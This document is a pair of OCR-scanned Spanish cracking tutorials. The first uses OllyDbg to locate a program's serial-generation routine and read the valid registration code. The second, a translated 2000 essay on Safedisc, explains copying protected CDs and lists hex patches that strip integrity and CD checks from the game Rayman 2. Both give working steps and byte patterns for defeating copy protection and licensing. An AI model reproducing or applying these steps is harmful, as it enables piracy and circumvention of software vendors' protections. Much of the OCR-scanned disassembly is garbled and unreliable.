TPrintout D02FSFD4 Font.Style = [] 
TPrintProgress 002F3698 e 
Li O OnClck = BiEtiChk 


Bueno despejada nuestras dudas. Abrimos nuestro OllyDbg, cargamos el ejecutable y 
CTRLG+G y colocamos la dirección 00578cf0 y llegamos hasta aquí 


% - [CPU - main thread, module WOW32] 


[6] File view Debug Plugins Options Window Help 


aaa HU AAA A AMA a AAA Rs 


. FEFFFFFF FFFFFFFF 
+  DADODODO dd ODODOODA 
+. 57 6F 77 76 dascii "Womversion",0 
00 db 00 
» FFEFFFFF dd FFFFFFFF 
+ 04000000 dd 00000004 
+ 6D 61 69 6E (ascii "main" ,0 
1 00 db 00 
2 00 db 00 
00 db 00 
. FRFFFFFF dd FFFFFFFF 
»  DCODOO0O dd DODOODOC 
+ 6D 61 6A 6F Jascii  "majorversion",0 
00 db 
00 


. FEFFFFFF 

« 08000000 

. 557365 72 
00 


FFFFFFFF 


00 
55 
8BEC 
8304 FS 
8955 FS 
8945 FC 
- 8845 FC m 2axy 
Fl. ES ESFBFFFF 00S788EC 
4||: 8815 A0025D0( edx, duord ptr [SDO240] WOW32 .0D5D2420 
c mov edx, deord ptr [edx] 
- $882 C9OSOO0Í mow byte ptr [edx+8C9], al 
2I|- Al A0025000 [mov , deord ptr [5DOZA0] 
5 mov eax, deord 
- 8480 C9O8000Í mov 
FIJO 8B15 ADO2500( mov WOW32.005D2420 


m e 
mov byte 


eax, 
0044DFE4 


. 8B12 

. 8882 C808000Í 
- 8B45 FC m 
. ES AFS2EDFF [cal 


Colocamos un BP (F2)en esa Direccion y ejecutamos el programa(F9); ingresamos 
nuestros datos y el OllyDbg parara en el BP que pusimos traceamos un poco 
(F8)hasta llegar al primer CALL[dirección 00578CFF], ya que si Apretamos una vez 
mas F8, nos muestra el mensaje de que nuestros datos son incorrectos. Quiere decir 
que en esa CALL[00578cff ] esta el meollo de donde se genera el serial y compara el 
serial Correcto con el Falso. 


Reiniciamos todos (Ctrl+f2) realizamos de nuevo todo el procedimiento hasta llegar a 
la dirección 00578CFF y esta vez en vez de Apretar F8 lo haremos con el F7 y vemos 
algo que nos indica de que vamos por buen camino: 
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% [CPU - main thread, module WOW32] 


Rs] Ejea 


55 ebp 
» 8BEC mor ebp, esp 
+ ES 58000000 ecx, 56 
SA 00 0 
SA 00 0 
49 ecx 
75 F9 short 005788F4 


53 pl 
8945 FC deord ptr [ebp-4], eax 
3300 a 


55 pu 
68 07885700 50578807 
: duord ptr fs:[eax] 


z m deord ptr fsileax], es 
8D95 SOFDFFF| edx, dhord ptr [ebp-2801 
Sa D80ss000 eax) duord ptr [SDOSDS 

eax) deord ptr [eax] 


mor 
ES dosreDrr Ea 00451868 
8885 SOFDFFF E 


8D55 EC 

ES 33L7E9FF 
C645 FB 01 
C745 F4 9CFFI 
8D95 ?8FDFFF! 
8B45 FC m 
8B80 E402000f 
ES CCASEBFF 


8B85 ?8FDFFFI 
8D8D ?CFDFFF! 


mo: 
8892 FOO20001 ptr [edx+2F0] 
A 10020004 m ed nerd te [eds 210] 


in 
ES E722EEFF [cal sac 
8885 ?CFDFFF 
50 1 

8D95 74FDFFF| ed, 
8B45 FC m ea, 
8880 ECO20001 nord ptr [eax+2EC] 
ES SOASEBFF [cal ERAS 

8895 74FDFFF 


E 
ES CCBSESFF 

74 39 Short Dos789cF 
6A 10 10 (Besotes = A pa 
ES A3FOESFF Quo «duserz2. MessageBeep> MessageBee] 
SA 10 


B9 ES8B5700 [mov Sex 00578BE8 ASCIT SO orized As 
+. BA 288€5700 Ps sus ió ASCII " a CEA 15 not eo mrctl yv 
21 GS0EEOnOo dumed nte 


En la parte de abajo esta la cadena de Texto que nos dice que el código para 
registrarnos no es correcto. Traceamos otra vez con F8 pero si nos fijamos en esta 
parte : 


005788EC /$ 55 push ebp 
005788ED |. 8BEC mov  ebp, esp 
005788EF |. B958000000 mov  ecx, 58 


005788F9 |.* 75 F9 iinz short 005788F4 
005788FB |. 53 push  ebx 


Existe un bucle que se va a repetir 58h veces (88 veces en decimal) hasta que ecx sea 
0. Como no nos pasaremos un buen rato traceando hasta que ECX valga 0. Entonces 
colocare un BP en la dirección 005788FB y apretamos F9 para que se detenga en el 
BP. Traceamos hasta el CALL de la dirección 00578983 y vemos en la ventana del 
Stack nuestro numero de serie correcto 


00D151D4 [ASCII “556133612 
D012EGA0|Pointer to next SEH record 
005788D7|SE handler 

0012E360 


00000000 
00000000 
00000000 
00000000 


E Edit Options Settings Vie 
Name Data... á 
Print setup... 

Print Chart(s)... 


Print Interpretation... 


Exit 


| Main Title [General backgro: 
Subtitle (Adrian: Sun in Ca 


A AA! 


Para los que quieren ver como se genera el serial, esta se realiza en el CALL de la 
dirección 00578968. Lo que realiza el programa es que juega con nuestro nombre 
ingresado hasta lograr un resultado de 8 digitos, por ejemplo en mi caso seria : 
87307322 de ahí coge el resultado y realiza operación cogiendo el ultimo digito 
primero y terminando con el primer digito del resultado, hasta lograr nuestro numero 
de serie correcto que en este caso seria : 55613612 


Y como para tener un poco mas de ayuda el serial correcto siempre será de 9 digitos, 
sea cual fuese el nombre ingresado 


[ Aclaracion] 
Perdonen, se que lo hice extenso pero es la forma como lo hice yo 
[ pF del autor ] 
Saludos a todo rvLCN; CracksLatinoS, Arc; y a ti por tomarte tu tiempo para leer este 
tutorial 
[ El autor puede ser contactado ] 
eMail: HOBASOgmail.com 
www: http: /RVLCN.com 
http: //RVLCNsecurity.com 
http://rvlcn.iespana.es 


http://beam.to/RVLCN - Lista 
http: //RVLCNsecurity.com/foro - Foro 
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El Crepúsculo de Safedisc 


Inversión Total de una Protección Genérica 


por ArthaXerXés 
Versión 1.0, 16 de Enero del 2000 
Traductor: X-Grimator (19/03/00) 


Copyright O 2000 ArthaXerXés y todos los que contribuyeron a “El Crepúsculo de Safedisc”. Todos los 
derechos reservados. 


Este documento se suministra “como es” sin garantía expresa o implícita, incluyendo, pero no restingiéndolo 
a, la mercantibilidad y la conveniencia para un propósito particular. 


ArthaXerXeés y los que contribuyeron a este documento no asumen responsabilidad alguna por daños direc- 
tos o indirectos resultantes de su uso, incluso si el daño es consecuencia de errores en el documento e incluso 
si uno o varios autores han sido advertidos de la posibilidad de tal daño. 


También, el uso ilegal de este documento es de su entera responsabilidad. No defendemos la piratería, este 
documento ha sido escrito para propósitos educacionales. 


Usted puede distribuir este documento libremente de cualquier modo, siempre que se mantenga en esta forma 
original. Si desease citar este documento, no olvide precisar el título, el autor y la versión. 
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Capítulo 1 


Introducción 


Veo las llamadas del Destino: déjame en tu dulce seno yacer, 
Allí deseaba vivir, y allí suplico morir. 
“Venus % Adonis” 


1.1 Una nota del autor 


¡Bienvenidos a este ensayo de inversión!. 


Este es el resultado de un duro y largo trabajo, así que realmente espero que lo apreciéis, y sobre todo, que 
aprendáis algo. 


Veréis que la protección genérica no es una buena opción para los autores de software pues desde el momento 
en que se rompe, todos los otros programas que usan la protección pueden ser quebrados también. No discuti- 
ré mis motivos por los que invierto totalmente Safedisc y escribo este ensayo. Ni es inmoral ni ilegal. Por 
supuesto que existen los “malos” usos de este Conocimiento, pero los programadores sólo podrán culpar a su 
pereza y estupidez. Somos invertidores, es nuestro propósito invertir. 


Notaréis que la composición es bastante inusual. Bien, desde ahora en adelante escribiré todos mis ensayos 
usando el famoso LATEX2e (intentad obtener el mismo resultado con Word...). Realmente debería haberlo 
usado antes. 


Si poseéis una impresora ideal (una impresora postscript), la mejor solución es por supuesto imprimir la ver- 
sión EPS de este documento que encontraréis en mi site (http://altern.org/xerxes/ o http://woodstok. incybers- 
pace.com/arthaxerxes). 


Tened en mente, de todos modos, que es una composición de dos caras. De otro modo, si deseáis leer este 
ensayo en su forma electrónica, la versión PDF es una buena elección. De nuevo, realmente deseo que dis- 
frutéis este ensayo. Y recordad, transmitid vuestro Conocimiento, pues si no lo hacéis, nuestra casta morirá. 


1.2 Qué hay en este ensayo 

Ciertamente os estáis preguntando sobre qué es todo este ensayo ya que hay tutoriales bien hechos y conse- 
guibles sobre “crackeo de Safedisc”. 

En este ensayo, no sólo aprenderéis como crackear Safedisc con y sin el CD original, sino también como 
trabaja internamente la protección. Este conocimiento está totalmente olvidado en los tutoriales existentes, y 


es la principal razón de porqué estoy escribiendo esto. Incluso veréis que uso un método diferente para 
crackear la protección. 


1.3 Los requisitos 


Esto no es un ensayo para principiantes, no hay duda sobre eso. Incluso un cracker avanzado puede tener 
algunas dificultades para entender algunas partes. 


Aquí hay una lista no exhaustiva del conocimiento que se precisa para el entendimiento completo de este 
documento: 


Una buena experiencia en crackeo. No hay profesor más grande que la experiencia. 

Lo básico de la estructura PE. 

Un sólido conocimiento de anti-debugging. 

Un conocimiento básico del manejo de memoria bajo Windows. 

Un buen conocimiento del lenguaje ensamblador x86 y del procesador en sí mismo. 
Archivos manuales ICD sin desempaquetar (leed los tutoriales de Black Check”s o R!SC). 


NA AA 


1.4 Software usado 


Os animo enfervecidamente a usar el software listado, hay equivalentes, por supuesto, pero harán más duro 
(imposible sin Softice o IDA) seguir mis pasos si usáis herramientas diferentes. Ya que ellas han sido elegidas 
por sus cualidades, no deberíais estar decepcionados por su funcionamiento. La versión usada por cada pro- 
grama no es necesariamente la última, es sólo la que tengo. 


Nombre Ver Categoría URL 
Softice 4.01 debugger http: //www.compuware.com 
IDA Pro 3.8b desensamblador http: //www.datarescue.com 
WinHex 8.85 editor hexadecimal http: //www.winhex.com 
Icedump e] dumper http://protools.cjb.net 
Procdump 1.6 dumper y editor PE http://procdump.cjb.net 
PEWizzard 1.10 editor PE http://protools.cjb.net 
FileMonitor 4.1 espía de sistema http://www.sysinternals.com 


Tabla 1.1: Software usado 


No todos estos programas son de uso libre. Tened esto en mente, por favor, y actuad en consecuencia. Expli- 
caré a su debido tiempo porqué necesitamos todos esos programas, de momento, aseguraos que los tenéis 
instalados en vuestro ordenador. 


1.5.Algunos agradecimientos y créditos convenientes 


Me gustaría agradecer a las siguientes personas, por la ayuda directa o indirecta que me proporcionaron. 


Black Check por los papeles que escribió, e incluso por la información adicional que me suministró con toda 
la buena voluntad. 


R!SC también por los papeles que escribió sobre la protección de Safedisc. 
Tola también escribió algunos papeles buenos sobre Safedisc. 


Pedro por el consejo sobre la comprobación dr7 (incluso si fue hace mucho tiempo, y por un asunto comple- 
tamente diferente). 


Fravia+ por el maravilloso sitio web que creó (que desafortunadamente se acabó), en el cual aprendí muchí- 
simo. 


The Prestige team por su paciencia, su ausencia de arrogancia (muy raro en la escena), incluso por ser los 
testeadores de mi método. 


Algunos íntimos amigos los cuales obviamente no nombro, que me ayudaron mucho proporcionándome 


software e incluso testeando mi trabajo. 


1.6 Contactar con el autor 


Sólo podéis llegar a mí a través de e-mail. Mi e-mail es xerxes Oaltern.org. Encontraréis mi llave pública PGP 
en mi sitio web. Si encontráis a alguien en el IRC diciendo ser ArthaXerXés, es mentira: no uso el IRC en 
absoluto. 


Antes de mandarme un e-mail, estaos seguros de que la respuesta a vuestras preguntas no está en este docu- 
mento o en otros documentos sobre los que hablé. Las preguntas estúpidas serán ignoradas. No gastéis vuestro 


tiempo con solicitudes de cracks: no soy un servicio de cracks. 


Naturalmente, debéis sentiros libres de contactar conmigo si tenéis información adicional que darme, o si 
encontrasteis un error en este papel. También, las preguntas inteligentes y observaciones son apreciadas. 


Yo hablo francés e inglés, el francés es mi lengua natural. 


Capítulo 2 


Copiando el CD 


¿Qué puede ser evitado 
qué final es otorgado por los poderosos Dioses? 
“Julio Caesar” 


2.1 Copia completa 

Contrariamente a lo que podáis pensar, no es imposible hacer una copia funcional de un CD protegido por 
Safedisc. La protección Safedisc confía en sectores irreproducibles. 

Generalmente, cuando copiáis un CD, lee los datos del sector, y regenera el CRC “on-the-fly” (en caliente), 


esto previene una pérdida de lo generado. La única forma de prevenir esto, es leer el sector completo, inclu- 
yendo su CRC, y escribirlo “como es”. Se llama copia RAW. 


2.1.1 Copia RAW 


Para tener éxito necesitáis dos cosas: 


1. una grabadora de CD que sea capaz de hacer una escritura DAO (Disc-At-Once) RAW. 
2. un software de grabado de CD que soporte escritura DAO RAW. 


El software no es obviamente un problema. La mayoría de los programas permiten escritura RAW, el más 
famoso es por supuesto Clone CD, pero Discjuggler también trabaja correctamente, por ejemplo. 


De todos modos, si vuestra grabadora de CD no soporta DAO RAW hay poco que hacer. Quizás hackeando la 
firmware dé buenos resultados (DAO RAW generalmente sólo es deshabilitada en la firmware), pero no es un 
hackeo fácil. 


Para determinar si vuestro hardware soporta DAO RAW, deberíais incluso comprobar vuestra documentación 


o mirar en el menú de funciones soportadas que tiene la mayoría del software. Os informaría si se soporta 
DAO RAW (TAO RAW no funcionará por razones obvias). 


RAW mago 
DIS? bytes per block 


Data Block ECC block 


Cooked mago 


48 brtas per hinck 


Figura 2.1: MODO 1 Estructura de bloques 


2.1.2 Grabando 


El proceso es muy simple. Recomiendo seguir estos pasos: 


1. Saber que la velocidad de lectura y escritura pueden afectar la calidad de la copia. Para resultados óptimos 
se aconseja la copia 1:1. De todos modos, con un buen hardware y buen software, velocidades más altas no 
afectarán a la calidad. 


2. ¡NO INTENTÉIS HACER UNA COPIA ON-THE-FLY (EN CALIENTE)!. No funcionará. 


3. Al principio, necesitáis crear una imagen del CD Safedisc. Para obtener una imagen correcta, debéis asegu- 
raros que los errores son ignorados, el modo RAW activado y el lector de CD con el que estáis haciendo la 
imagen soporta lectura RAW. El proceso completo de lectura es un poco largo, así que sed pacientes. 


4. Una vez que la imagen está hecha, la única cosa que falta hacer es iniciar la grabación. De nuevo, compro- 
bad que el modo RAW está activado y que los errores serán escritos incorrectamente (esto es, ignorados). 


2.1.3 Los límites 


Ciertamente os preguntáis por qué invierto totalmente safedisc si copiarlo es tan fácil. El método explicado 
tiene algunos límites que ciertamente notáis. 


1. Pocas grabadoras de CD soportan DAO RAW. 
2. La copia DAO RAW es poco fidedigna, la pérdida de generación es muy importante. 


3. La protección Safedisc es muy lenta, la comprobación hecha antes de que el juego comience es tiempo 
perdido. Sobre todo, el CD se necesita para jugar el juego, lo cual es molesto. Pienso que los programadores 
creen que comprar una protección es una pérdida de dinero. En mi opinión, un manual bien hecho es una 
protección mucho mejor. Cuesta demasiado copiar un manual, y está lejos de reemplazar al original (visto que 
no hay diferencia entre un original CD y uno copiado). 


Capítulo 3 


Quitando la protección safedisc 


Traviesas hermanas, que teméis, 

Al solitario viajero de la noche, 

El cual, como tétricos cuervos llorando, 

Golpea las ventanas del morir, 

¡Aparece! Aparece a mi llamada y contribuye en la fama 
De un daño que hará que toda Carthago arda. 
¡Aparece! 

“Dido 4 Aeneas” 


3.1 Trabajando con el CD original 


Nuestro ejemplo es el juego Rayman 2. Está protegido con una versión reciente Safedisc, pienso que es r3 
(pero uno recién salido de fábrica acaba de ser aparentemente emitido...). 


3.1.1 Camuflando Softice 


Safedisc usa varias formas de detectar un debugger, de forma que debéis camuflar Softice. 

e  Cambiad el valor de retorno 68h a 4300h. 

e  Cambiad todos los nombres de los drivers. 

e  Elregistro de comprobación de debug será quitado más tarde. 

Hay un montón de documentos que explican cómo hacerlo, es muy fácil (hay incluso programas que lo hacen 


por vosotros). No recomiendo usar Frogice, es una herramienta excelente de detección, pero es mejor modifi- 
car directamente Softice. 


3.1.2 Recuperando el dato descifrado 

Hay un montón de datos que dumpear antes de que realmente comencemos a crackear. Como ya sabéis, el 
ICD contiene tres partes que están cifradas: 

1. la sección .texto 

2. la sección .data 

3. la sección .rdata (trataremos esta sección más tarde) 

Además, la sección .data se modifica durante la ejecución del ICD después de que sea desempaquetado, esto 


es porque nosotros podemos dumpear la sección .data sólo durante un período limitado: después de que ha 
sido decodificado y antes de que comience la ejecución del programa. 


El mejor modo probablemente sea poner un breakpoint en la FreeLibrary. La longitud de todas las secciones y 
sus respectivas direcciones de comienzo pueden ser determinadas con la ayuda de Procdump. Simplemente 
abrid el archivo rayman?2.icd, y elegid “PE editor”. Incluso necesitaréis escribir abajo el punto de entrada del 
ejecutable, por supuesto. 


Con mi método, incluso necesitamos hackear dplayerx.dll y rayman2.exe. Ambos archivos tienen secciones 
cifradas de .txt, también debemos dumpearlas. 


¡Hora de dumpear! 


1. Estad seguros de que Softice esté cargado, pulsad CTRL-D y escribid los comandos : bc * ; bpx 
FreeLibrary ; bd * ; g (; representación de ENTER). 


2. Ejecutad rayman2.exe incluso con el original o una copia DAO RAW del Rayman 2 CD. 
3. Esperad a que el logo desaparezca, pulsad CTRL-D y activad el breakpoint (be *). 


4, Deberíais encontraros en el Softice unos pocos segundos después de que el breakpoint haya sido activado. 
Pulsad Fl11 (o escribid g Css:esp) para volver a la llamada (la cual debería estar sin dplayerx). 


5. Desensamblad el punto de entrada de rayman2.icd, y escribid u 45fcc0. Deberíais ver este código: 
push ebp 

mov ebp , esp 

push f£ffffffh 

push 0049 c9d0h 

push 0045 ff90h 


mov eax , dword ptr fs :[00000000] 
push eax 


Si no lo hacéis, significa que la sección .txt aún no está descifrada. Pulsad g y esperad que el debugger salte 
de nuevo. 

6. Dumpead todas las secciones: 

(a) rayman2.exe.txt (localizado en d 401000 c800 r2_txt.dmp) 

(b) dplayerx.txt (localizado en d 8ee000 9e31 dx_txt.dmp) 

(c) rayman2.icd.data (localizado en d 9£000 7c00 r2_data.dmp) 

(d) rayman2.icd.text (localizado en d 401000 92200 r2_text.dmp) 


Incluso podéis ver el tamaño de las secciones con la ayuda del map32. No olvidéis activar las páginas cuando 
dumpeéis rayman2.exe.txt, con la ayuda del comando addr. Desactivarlas cuando esté hecho. 


7. Ahora tenéis 4 archivos: r2_txt.dmp, dx_txt.dmp, r2_data.dmp y r2_text.dmp. 


3.1.3 Reconstruyendo los archivos 


Hay que hacer una cosa antes de que crackeemos la protección, tenéis por supuesto que reconstruir ray- 
man2.exe, dplayerx.dll y rayman2.icd con las secciones dumpeadas. Podéis incluso usar Procdump o 
PEWizzard. En mi ejemplo usé PEWizzard. 


Aquí está cómo reconstruir rayman2.icd, el método es idéntico para rayman2.exe y dplayerx.dll, excepto que 
el nombre de las secciones cambia, por supuesto. 


1. Cread un directorio llamado icd_rebuild. Copiad 12_data.dmp, r2_text.dmp y rayman2.icd en este directo- 
rio. Si PEWizzard no está en vuestro path, también copiadlo en este directorio. 


2. Abrid un prompt de DOS en este directorio. Dividid el archivo ICD (trozo-partido rayman2.icd). 


3. Renombrad secciónO.bin a r2_text.cod, copiad r2_text.dmp a secciónO.bin. Ambos archivos deben tener 
exactamente el mismo tamaño en bytes. 


4. Renombrad sección2.bin a r2_data.cod, copiad r2_data.dmp a sección2.bin. Ambos archivos deben tener 
exactamente el mismo tamaño en bytes. 


5. Renombrad rayman2.icd.pe a icd.pe. Renombrad rayman2.icd a sincrackear.icd. 


6. Reconstruid el archivo ICD (trozo-unido icd.pe rayman2.icd). Ambos archivos ICD deberían tener a la 
fuerza el mismo tamaño (es posible que el ejecutable reconstruido sea un poco más pequeño). 


Una vez que hayáis hecho esto con todos los archivos, podéis copiarlos al directorio principal de instalación o 
Rayman 2. Por supuesto que se aconseja hacer una copia de seguridad de los archivos en otro directorio antes 
de hacerlo. 


3.1.4 Desprotegiendo rayman2.exe 


El resultado .txt 


Probablemente notasteis que el programa se cuelga si ponéis breakpoints en él. Esto es porque hace compro- 
baciones en estas secciones, y usa el valor de esas comprobaciones para descodificar la de .txt. Una vez que 
el programa sea desprotegido, veréis que podéis poner breakpoints donde deseéis. 


Si intentáis ejecutar ahora el rayman2.exe hackeado se cerrará, ya que intenta descodificar secciones que ya 
están descodificadas. Es el momento de desensamblar rayman2.exe y dplayerx.dll con IDA. Elegid 686 para 
el procesador. El proceso completo de desensamblado se tomará unos cuantos minutos, dependiendo de la 
velocidad de vuestro ordenador. 


Una vez hecho, activad fallos (faults on) en Softice, y ejecutad el ejecutable. Deberíais estar dentro de ray- 
man2, esto es lo que queremos. Poned un breakpoint en la primera dirección de memoria de la sección .txt 
(bpm 401000 R). Ejecutad el programa de nuevo. Estaréis en esta rutina de memoria copiada: 


mov ecx , [esp +8+arg_8] ; cuántos copiar 
mov esi , [eax +4] 

mov edi, [esp +8+arg_4] 

mov eax , ecx 

add esi , edi ; copiar desde 

mov edi, [esp +8+arg_C] ; copiar a 

shr ecx , 2 ; cuántos copiar div 4 

repe movsd ; <- esto es probablemente donde apareceréis 
mov ecx , eax 

mov ax, 1 

and ecx , 3 ; cuántos copiar mod 4 

repe movsb 

pop edi 


pop esi 
retn 


Ahora es sabio poner un breakpoint en edi-4 (bpm edi-4). Deberíais escribir ahora g. Apareceréis de nuevo, 
pero en un sitio diferente, que parece una rutina de comprobación. 


mov eax , [ebp +8] 

mov ecx , [eax] 

mov [ebp+var_8] , ecx ; <- seguramente apareceréis aquí 
mov edx , [ebp +8] 

mov eax , [edx +4] 

mov [ebp+var_C] , eax 

mov ecx , ds : dword_42F010 

mov [ebp+var_10] , ecx 


Probablemente notaréis que hay un montón de saltos inútiles. Todos esos saltos están aquí para hacer el tra- 
ceado y desensamblado más difícil, son totalmente inútiles. 


Esto es por lo que IDA es útil, recordad, IDA significa Desensamblador Avanzado Interactivo. 
Interactivo: esta es la clave importante. Realmente espero que sepáis cómo usar IDA, porque 
no os lo voy a enseñar: llevaría demasiado tiempo. Leed vuestros manuales de IDA o algunos 
tutoriales sobre la materia si os sentís perdidos. 


Incluso os recomiendo encarecidamente renombrar las funciones, etiquetas y variables para 
explicitar nombres, hace la inversión mucho más fácil. 


3.1.4.Desprotegiendo rayman2.exe 


Por supuesto, la rutina de comprobación en la que acabamos está localizada en la sección .txt2. Desde que el 
punto de entrada del ejecutable está en la sección .texto, podemos asumir que la función que hace el descodi- 
ficado completo de la sección .txt es llamada en la sección de .texto. 


Tenemos dos alternativas: podemos tracear desde el punto de entrada y monitorear si los cambios son realiza- 
dos en la sección .txt, o podemos usar referencias cruzadas para encontrar cuál es la función principal. El 
último método es el que yo he usado, pero podéis usar el otro si preferís, de todos modos, en mi opinión es 
menos fiable en este caso. 


En IDA id al inicio de la función “comprobación” en la cual acabasteis. Renombradla a “comprobación_0”. 
Id a la llamada y renombradla “comprobación_1”, y continuad hasta encontraros vosotros mismos dentro de 
una función llamada desde la sección .texto. 


nota: es altamente probable que algunas funciones no sean detectadas por IDA. Si este es el ca- 
so, tendréis que darle al cursor hacia arriba hasta encontrar esta secuencia: 


push ebp 
mov ebp , esp 
push... 


Esto marca el principio de la función. Reconstruidla desde aquí (pulsad P) o usad el menú. 
Incluso IDA puede verse confundido por el siguiente código: 


jmp corto cerca ptr loc_loquesea+1 


loc_loquesea : 
código desensamblado incorrecto 


Para superar esta dificultad, tendréis que dejar sin definición el código en la dirección 
loc_loquesea , y redefinirlo como código de inicio en la dirección loc_loquesea+1. 


El proceso completo puede llevar algún tiempo, y probablemente deseéis testearlo con Softice si encontráis la 
llamada correcta. Casualmente, encontraréis la "gran" llamada en la dirección 00410494, la función es 
004270ad. Probablemente notéis que el programa usa una comprobación hecha en la sección .txt2 para des- 
codificar la sección .txt. Quitar la llamada a la función resolverá por lo tanto dos problemas. 


loc_410A94 : ; CODE XREF-: . texto :00410 A90 
call comprobación_6 
add esp, 4 


Eliminar esta llamada resolverá nuestro pequeño problema. Usad WinHex, buscad la cadena e8 14 66 (veréis 
que es única) y cambiadla pro eb 03. Ya hicimos la mayoría del trabajo más duro concerniente a rayman2.exe, 
pero aún hay una o dos cosas que hacer. 


Comprobación de archivos locales 


Si intentáis ejecutar ahora el ejecutable, veréis (con FileMonitor por ejemplo) que carga dplayerx.dll y ray- 
man2.icd del CD. Lo que está haciendo es comprobando los archivos y si fueron modificados, los carga en 
lugar de ello del CD. 


Esta protección es fácil de encontrar y quitar. Para encontrarla, poned un breakpoint en GetFileAttributesA, y 
esperad hasta que sea llamada con dplayerx.dll o rayman2.icd como parámetros. GetFileAttributesA es llama- 
do por el shell y por clokspl.exe antes de que sea llamado por rayman2.exe. 


Deberíais aparecer en este código: 


mov esi, [ebp+arg_4] 

mov edi , ds : GetFileAttributesA 

push esi ; <- esi apunta al nombre del archivo a comprobar 
call edi ; comprobando el archivo... 

cmp eax , O FFFFFFFFh 


Si analizáis la función cuidadosamente, veréis que es fácil de crackear. Este código hace la comprobación: 


loc_4052E0 : ; CODE XREF: comprueba_archivo +96 
cmp word ptr [ecx] , 0 
jnz loc_40541F ; aquí saltamos si el archivo local es correcto 


Por lo tanto, nosotros debemos meramente hacer el salto incondicional. Veréis que deberíamos saltar a la 
dirección en la que eax se sitúa a 1 (verdadero). La cadena a buscar es 0f 85 35 01, la cadena a poner es e9 36 
01 00 00. Ahora los archivos locales están cargados. 


Más comprobaciones 


Aún se hacen comprobaciones, y es buena idea quitarlas, ¿no?. Como es natural, si ponéis un breakpoint en 
401000, las encontraréis. 

La más fácil de quitar es la llamada desde el "código limpio" (es decir sin 10*'**” saltos más o menos). Justo 
después de la llamada, eax se testea. A menos que seáis absolutamente estúpidos, probablemente adivinaréis 
que esto puede ser quitado fácilmente modificando la función que es llamada. 


loc_4028FD : ; CODE XREF: CD_illa_check_2+AC 
push 2 

call comprobación_2_5 ; la comprobación desastrosa 
add esp, 4 

test ax , ax; eax==0__ ¡no hay sopa para ti! 

jnz corto loc_40294F 


Para quitar la función, buscad 55 8$B EC 83 EC 0C 53 56 57 EB 01 EE (la cadena única más corta) y reempla- 
zadla por 33 c0 40 c3 or b8 01 00 00 00 e3, si lo preferís. Ahora, la función siempre devolverá el valor 1. 


Las otras comprobaciones están en la dirección 4115d6 : 


las_comprobaciones : ; CODE XREF-: . texto :004115 C9 
mov eax , [ebp 


loc_4115D9 : ; CODE XREEF: . texto :004115 B9 
push offset a_txt_1 ; pusheando la sección txt 1 
mov ecx , [ebp 

sub esp , O Ch 

mov edx , esp 

mov [edx] , eax 

mov eax , [ebp 

mov [edx +4], ecx 

mov [edx +8], eax 

call cerca ptr desastrosa_comprobación ; aquí comprobamos la sección .txt 
add esp, 10h 

mov edx , [ebp 

mov eax , [ebp 

push offset a_txt2_1 ; pusheando sección txt 2 
sub esp , O Ch 


loc_411607 : ; CODE XREF-: . texto :0041163 B 
mov ecx , esp 

mov [ecx] , edx 

mov edx , [ebp 
mov [ecx +4], eax 

mov [ecx +8], edx 

call cerca ptr desastrosa_comprobación ; aquí comprobamos la sección . txt 2 


loc_411619 : ; CODE XREF-: . texto :004115 CE 
add esp, 10h 


xor esi, esi 


Aquí mi elección fue "saltar sobre" las dos llamadas. Buscad 02 EB OB EB FC D7 El 4A 76 BA 98 05 A5 0D 
8B y cambiad 02 con 53. ¡Las comprobaciones están ahora aniquiladas!. 


La mundana comprobación de CD 


Hay un primer emplazador de la protección del CD, que permite que Safedisc rápidamente detecte si está 
insertado un CD incorrecto o ningún CD en absoluto. Si ponéis un breakpoint en GetDriveTypeA encontraréis 
esto a la primera. Es mejor quitar esta protección si deseáis hacer un "crack no CD". Si no la quitáis, necesita- 
réis una copia perfecta del CD, y no se os permitirá tener el crack en el CD. 


La función es 4124f0, aquí está el código: 
primera_CD_comprobación proc cerca ; CODE XREF- . texto :0040 F6AF 


var_104 = byte ptr h 
arg_0= dword ptr 4 


sub esp, 104 h 

lea eax , [esp +104h+var_104] 
push 104 h 

push eax 

push 0 

call ds : GetModuleFileNameA 
lea ecx , [esp +104h+var_104] 
push ecx 

call ds : GetDriveTypeA 

cmp eax , 5 

jnz corto CD_driver_encontrado 
mov edx , [esp +104h+arg_0] 
lea eax , [esp +104h+var_104] 
push edx 

push eax 

call sub_412780 

add esp, 8 

add esp , 104 h 

retn 


CD_driver_encontrado : ; CODE XREF: primera_CD_comprobación +26 
mov ecx , [esp +104h+arg_0] 

lea edx , [esp +104h+var_104] 

push ecx 

push edx 

call CD_sub_comprobación ; esta función vuelve con valor 1 

add esp , 8 ; cuando todo esté correcto 

add esp , 104 h 

retn 

primera_CD_comprobación endp 


Esta protección es mundana. Para quitarla, sólo tenéis que reemplazar la cadena 81 EC 04 01 00 00 8D 44 por 
33 c0 40 c3 o b8 01 00 00 00 c3. 


La verdadera comprobación de CD 


Ahora tenemos que quitar la verdadera comprobación del CD. Localizarla es muy fácil, ya que es tan lenta 
que tendréis que tracear hasta que tengáis hecha alguna operación larga de CD. Si estrecháis vuestra búsque- 


da, rápidamente encontraréis la rutina, la cual es 4064d0. Esta función es llamada dos veces desde la misma 
función (4055b0). Aquí está el código correspondiente a las llamadas: 


push esi ; ¿veis el argumento? 

push offset byte_436100 ; ¿y éste? 

mov ecx , [ebp+arg_14] 

sub esp , O Ch 

mov edx , esp 

mov [edx] , eax 

mov eax , [ebp+arg_18] 

mov [edx +4], ecx 

mov [edx +8], eax 

call cerca ptr safedisc_CD_comprobación ; <- llamado aquí 
add esp, 14h 

mov ebx , eax ; el resultado de la función está en eax 
mov [bp+var_C] , edi 

jmp loc_40581A 


loc_4056F3 : ; CODE XREF: gran_CD_comprobación+E8 gran_CD_comprobación+FC ... 
mov edx , [ebp+arg_10 

push edi ; aquí tenemos un argumento diferente 

push offset byte_436100 ; el mismo argumento que arriba 
mov eax , [ebp+arg_14] 

sub esp , O Ch 

mov ecx , esp 

mov [ecx] , edx 

mov edx , [ebp+arg_18] 

mov [ecx +4], eax 

mov [ecx +8], edx 

call cerca ptr safedisc_CD_comprobación ; <- y aquí 

add esp, 14h 

mov ebx , eax ; de nuevo el resultado de la función está en eax 
mov [ebp+var_C] , edi 

jmp loc_40581A 


Usad la técnica que hemos usado muchas veces: haced que la función siempre devuelva valor 1. Para esto, 
debéis buscar la cadena 55 8b ec 53 56 57 bb y reemplazarla por 33 c0 40 c3 or b8 01 00 00 00 c3. No hay 
más protección de CD en rayman2.exe, ¡enhorabuena, invertidores!. 


nota: notaréis que el LED de vuestra unidad de CD se ilumina, esto es porque aún se hace al- 
